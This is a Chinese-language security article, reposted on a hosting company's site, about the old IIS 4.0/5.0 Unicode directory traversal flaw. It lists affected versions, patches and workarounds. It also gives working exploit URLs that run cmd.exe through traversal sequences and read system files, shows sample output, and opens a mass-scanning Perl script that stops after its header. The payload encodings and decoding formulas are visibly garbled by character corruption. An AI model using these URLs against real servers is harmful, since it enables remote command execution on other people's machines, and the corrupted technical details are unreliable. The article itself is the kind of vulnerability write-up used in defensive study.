IIS UNICODE Bug

来源：互联网 作者：west263.com 时间：2008-04-16

西部数码-全国虚拟主机10强！40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

一．存在的漏洞
1. 微软IIS 4.0 / 5.0 存在扩展UNICODE目录遍历漏洞，该漏洞既是一远程漏洞，同时也是一本地漏洞。
受影响的版本：
Microsoft IIS 5.0
Microsoft Windows NT 2000
Microsoft IIS 4.0
Microsoft Windows NT 4.0
Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
不受影响的版本：
漏洞描述：
微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"＼"而能利用"../"
目录遍历的漏洞。
未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知
的文档。该账号在默认情况下属于Everyone 和Users组的成员，因此任何和
Web根目录在同一逻辑驱动器上的能被这些用户组访问的文档都能被删除，
修改或执行，就如同一个用户成功登陆所能完成的相同。
测试方法：
http://target.computer/scripts/..�../path/solo.txt
蜡 = /
翜 = 解决方案:
该漏洞补丁随微软安全公告MS00-057一起发布
(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
能够从如下地址下载补丁:
IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q301625/default.asp
IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q301625/default.asp
2．IIS 4.0/5.0 unicode解码漏洞导致文档泄漏或执行
IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户能够远程通过IIS执行任意命令。当IIS打开文档时，假如该文档名包含unicode字符，他会对其进行解码，假如用户提供一些特别的编码，将导致IIS错误的打开或执行某些web根目录以外的文档。
对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文档名中包含一个特别的编码例如"�%hh"
或"�%hh",他会首先将其解码变成:0xc10xhh，然后尝试打开这个文档，Windows 系统
认为0xc10xhh可能是unicode编码，因此他会首先将其解码，假如 0x00<= %hh < 0x40的话，
采用的解码的格式和下面的格式类似：
�%hh -> (0xc1 - 0xc0) * 0x40 0xhh
�%hh -> (0xc0 - 0xc0) * 0x40 0xhh
因此，利用这种编码，我们能够构造很多字符，例如:
� -> (0xc1 - 0xc0) * 0x40 0x1c = 0x5c = '/'
N �/ -> (0xc0 - 0xc0) * 0x40 0x2f = 0x2f = '/'
攻击者能够利用这个漏洞来绕过IIS的路径检查，去执行或打开任意的文档。
(1) 假如系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能
列出当前目录的内容：
http://www.victim.com/scripts/..�../winnt/system32/cmd.exe?/c dir
(2) 利用这个漏洞查看系统文档内容也是可能的：
http://www.victim.com/a.asp/..�../..�../winnt/win.ini
Rain Forest Puppy <rfp@WIRETRIP.NET>测试发现对于英文版的IIS 4.0/5.0,此问题同样
存在，只是编码格式略有不同，变成"蜡"或"翜".
2. 临时解决方法：
1、假如无需可执行的CGI，能够删除可执行虚拟目录,例如 /scripts等等。
2、假如确实需要可执行的虚拟目录，建议可执行虚拟目录单独在一个分区
厂商补丁：
微软已发布了一个安全公告MS00-78，您能够在下列地址看到更周详的内容：
http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp
补丁能够从下列地址下载：
Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q301625/default.asp
Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q301625/default.asp
二．UNICODE漏洞的原理
　　上述漏洞一从中文IIS4.0 SP6开始，还影响中文WIN2000 IIS5.0、中文WIN2000 IIS5.0 SP1，台湾繁体中文也同样存在这样的漏洞。
　　中文版的WIN2000中，UNICODE编码存在BUG，在UNICODE 编码中
� -〉 (0xc1 - 0xc0) * 0x40 0x1c = 0x5c = '/'
�/ -〉 (0xc0 - 0xc0) * 0x40 0x2f = 0x2f = '＼'
　　在NT4中/编码为翜
　　在英文版里：WIN2000英文版蜡
　　但从外国某些站点得来的资料显示，更有以下的编码能够实现对该漏洞的检测， �%pc
�%9v
�%qf
�%8s
鄝�
饊€�
鼆€€€�
三。UNICODE漏洞的检测
　　以下均以中文版WIN2K为例，假如是其他NT版本，按上面所述的编码替换以下代码中的�最简单的检测方法：
比如说有一IP地址为X.X.X.X的WIN2K主机，我们能够在地址栏输入x.x.x.x/scripts/..�../winnt/system32/cmd.exe?/c dir假如存在此漏洞的话，我们便能够看到以下的内容：（例子假设SCRIPTS目录里无文档）
Directory of C:＼inetpub＼scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 ..
　　实际上也能够改为这样127.0.0.1/scripts/..�../winnt/system32/cmd.exe?/r dir即r=c 这个字母的取代，关于r这字母能够等效于c,我们能够通过cmd/?能够得到解释。
　　当然，假如目标主机的管理员把该目录删除掉，我们就无法看到了，但是更有以下的目录是同样能够用来测试的。
http://x.x.x.x/msadc/..�../..�../..�../winnt/system32/cmd.exe?/c dir
运行后，我们能够看到
Directory of c:＼program files＼common files＼system＼msadc
2000-08-06 19:16
.
2000-08-06 19:16
..
（以下内容略）
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free
　　假如漏洞和目录同时存在的话，您就能够在WEB页上看到相对应的目录里的一切内容。这仅是对单一目标主机的漏洞检测，假如想对某一IP段上的NT主机做UNICODE漏洞的检测，我们就需要使用类似以下的扫描软件。以下的源码是外国黑客写的，当然就只扫描英文版的NT，要扫描中文版的，需要做相应的修改。
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

[打印] [关闭]

相关文章

上一篇：驱除威胁—无线网络防黑完全攻略
下一篇： BBS3000漏洞

热点关注

IDC资讯虚拟主机域名注册托管租用 vps主机智能建站
网站运营建站经验策划盈利搜索优化网站推广免费资源
网站联盟联盟新闻联盟介绍联盟点评网赚技巧
行业资讯业界动态搜索引擎网络游戏门户动态电子商务广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器安全防护
软件技巧其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识网络协议网络安全网络管理组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD

版权所有西部数码(www.west263.com)
CopyRight (c) 2002~2007 west263.com all right reserved.
公司地址：四川成都市万和路90号天象大厦4楼　邮编：610031
电话总机：028-86263408 86263960 86264018 86267838 86262244 86263408
售前咨询：总机转201 202 203 204 205 206 207 208
售后服务：总机转211 212 213 214 217 218 晚上0点以后拔分机225